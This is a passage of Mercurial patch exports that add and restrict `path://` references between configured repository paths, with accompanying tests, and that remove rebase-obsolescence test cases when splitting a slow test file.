-2331,6 +2334,22 @@ self._apply_suboptions(ui, sub_opts) + def chain_path(self, ui, paths): + if self.url.scheme == b'path': + assert self.url.path is None + subpath = paths[self.url.host] + self.url = subpath.url + self.rawloc = subpath.rawloc + self.loc = subpath.loc + if self.branch is None: + self.branch = subpath.branch + else: + base = self.rawloc.rsplit(b'#', 1)[0] + self.rawloc = b'%s#%s' % (base, self.branch) + suboptions = subpath._all_sub_opts.copy() + suboptions.update(self._own_sub_opts) + self._apply_suboptions(ui, suboptions) + def _validate_path(self): # When given a raw location but not a symbolic name, validate the # location is valid. diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -211,3 +211,126 @@ 000000000000 $ cd .. + +Testing path referencing other paths +==================================== + +basic setup +----------- + + $ ls -1 + a + b + gpath1 + suboptions + $ hg init chained_path + $ cd chained_path + $ cat << EOF > .hg/hgrc + > [paths] + > default=../a + > other_default=path://default + > path_with_branch=../branchy#foo + > other_branch=path://path_with_branch + > other_branched=path://path_with_branch#default + > pushdest=../push-dest + > pushdest:pushrev=default + > pushdest2=path://pushdest + > pushdest-overwrite=path://pushdest + > pushdest-overwrite:pushrev=foo + > EOF + + $ hg init ../branchy + $ hg init ../push-dest + $ hg debugbuilddag -R ../branchy '.:base+3<base@foo+5' + $ hg log -G -T '{branch}\n' -R ../branchy + o foo + | + o foo + | + o foo + | + o foo + | + o foo + | + | o default + | | + | o default + | | + | o default + |/ + o default + + + $ hg paths + default = $TESTTMP/a + gpath1 = http://hg.example.com/ + other_branch = $TESTTMP/branchy#foo + other_branched = $TESTTMP/branchy#default + other_default = $TESTTMP/a + path_with_branch = $TESTTMP/branchy#foo + pushdest = $TESTTMP/push-dest + pushdest:pushrev = default + pushdest-overwrite = $TESTTMP/push-dest + pushdest-overwrite:pushrev = foo + pushdest2 = $TESTTMP/push-dest + pushdest2:pushrev = default + +test basic chaining +------------------- + + $ hg path other_default + $TESTTMP/a + $ hg pull default + pulling from $TESTTMP/a + no changes found + $ hg pull other_default + pulling from $TESTTMP/a + no changes found + +test inheritance of the #fragment part +-------------------------------------- + + $ hg pull path_with_branch + pulling from $TESTTMP/branchy + adding changesets + adding manifests + adding file changes + added 6 changesets with 0 changes to 0 files + new changesets 1ea73414a91b:bcebb50b77de + (run 'hg update' to get a working copy) + $ hg pull other_branch + pulling from $TESTTMP/branchy + no changes found + $ hg pull other_branched + pulling from $TESTTMP/branchy + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 0 changes to 0 files (+1 heads) + new changesets 66f7d451a68b:2dc09a01254d + (run 'hg heads' to see heads) + +test inheritance of the suboptions +---------------------------------- + + $ hg push pushdest + pushing to $TESTTMP/push-dest + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 0 changes to 0 files + $ hg push pushdest2 + pushing to $TESTTMP/push-dest + searching for changes + no changes found + [1] + $ hg push pushdest-overwrite --new-branch + pushing to $TESTTMP/push-dest + searching for changes + adding changesets + adding manifests + adding file changes + added 5 changesets with 0 changes to 0 files (+1 heads) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616540133 -3600 # Tue Mar 23 23:55:33 2021 +0100 # Node ID 1ecf082386b707d80d06caba6a9d3e75bdbe43b5 # Parent 83b0a5c0dfec1509edf6b450a1c8c03bbe057f14 path: forbid chaining `path://` definitions To have `path://xxx` referencing paths that use `path://` too, we need to analyze dependencies to initialize them in the right order (and to detect cycle). I don't want to deal with that right now, so I just disallow it for now. Differential Revision: https://phab.mercurial-scm.org/D10264 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2317,6 +2317,8 @@ u.fragment = None self.url = u + # the url from the config/command line before dealing with `path://` + self.raw_url = u.copy() self.branch = branch self.name = name @@ -2338,6 +2340,10 @@ if self.url.scheme == b'path': assert self.url.path is None subpath = paths[self.url.host] + if subpath.raw_url.scheme == b'path': + m = _('cannot use `%s`, "%s" is also define as a `path://`') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) self.url = subpath.url self.rawloc = subpath.rawloc self.loc = subpath.loc diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -3144,6 +3144,21 @@ if v is not None: setattr(self, a, urlreq.unquote(v)) + def copy(self): + u = url(b'temporary useless value') + u.path = self.path + u.scheme = self.scheme + u.user = self.user + u.passwd = self.passwd + u.host = self.host + u.path = self.path + u.query = self.query + u.fragment = self.fragment + u._localpath = self._localpath + u._hostport = self._hostport + u._origpath = self._origpath + return u + @encoding.strmethod def __repr__(self): attrs = [] diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -334,3 +334,39 @@ adding manifests adding file changes added 5 changesets with 0 changes to 0 files (+1 heads) + +Test chaining path:// definition +-------------------------------- + +This is currently unsupported, but feel free to implement the necessary +dependency detection. + + $ cat << EOF >> .hg/hgrc + > chain_path=path://other_default + > EOF + + $ hg id + 000000000000 + $ hg path + abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + [255] + $ hg pull chain_path + abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + [255] + +Doing an actual circle should always be an issue + + $ cat << EOF >> .hg/hgrc + > rock=path://cissors + > cissors=path://paper + > paper=://rock + > EOF + + $ hg id + 000000000000 + $ hg path + abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + [255] + $ hg pull chain_path + abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + [255] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616540698 -3600 # Wed Mar 24 00:04:58 2021 +0100 # Node ID 395cf404e76a9aad0375d91959f63d6cd0427555 # Parent 1ecf082386b707d80d06caba6a9d3e75bdbe43b5 path: error out if the `path://` reference point to an unknown path Differential Revision: https://phab.mercurial-scm.org/D10265 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2339,7 +2339,12 @@ def chain_path(self, ui, paths): if self.url.scheme == b'path': assert self.url.path is None - subpath = paths[self.url.host] + try: + subpath = paths[self.url.host] + except KeyError: + m = _('cannot use `%s`, "%s" is not a known path') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) if subpath.raw_url.scheme == b'path': m = _('cannot use `%s`, "%s" is also define as a `path://`') m %= (self.rawloc, self.url.host) diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -370,3 +370,18 @@ $ hg pull chain_path abort: cannot use `path://other_default`, "other_default" is also define as a `path://` [255] + +Test basic error cases +---------------------- + + $ cat << EOF > .hg/hgrc + > [paths] + > error-missing=path://unknown + > EOF + $ hg path + abort: cannot use `path://unknown`, "unknown" is not a known path + [255] + $ hg pull error-missing + abort: cannot use `path://unknown`, "unknown" is not a known path + [255] + # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616516009 25200 # Tue Mar 23 09:13:29 2021 -0700 # Node ID 13b200ffe8eb08ca6c3aa1e2076f0971fef30c12 # Parent 395cf404e76a9aad0375d91959f63d6cd0427555 tests: split up test-rebase-obsolete.t in four pieces The test case took 42 seconds to run the test before this patch and 12 seconds after (wall time, of course). Differential Revision: https://phab.mercurial-scm.org/D10255 diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete.t @@ -743,1396 +743,3 @@ 1 new orphan changesets $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . -d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. - - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. - - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G -r 'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - note: not rebasing 2:a82ac2b38757 c "c", it has no successor - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ cd .. - -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [10] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. - - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - 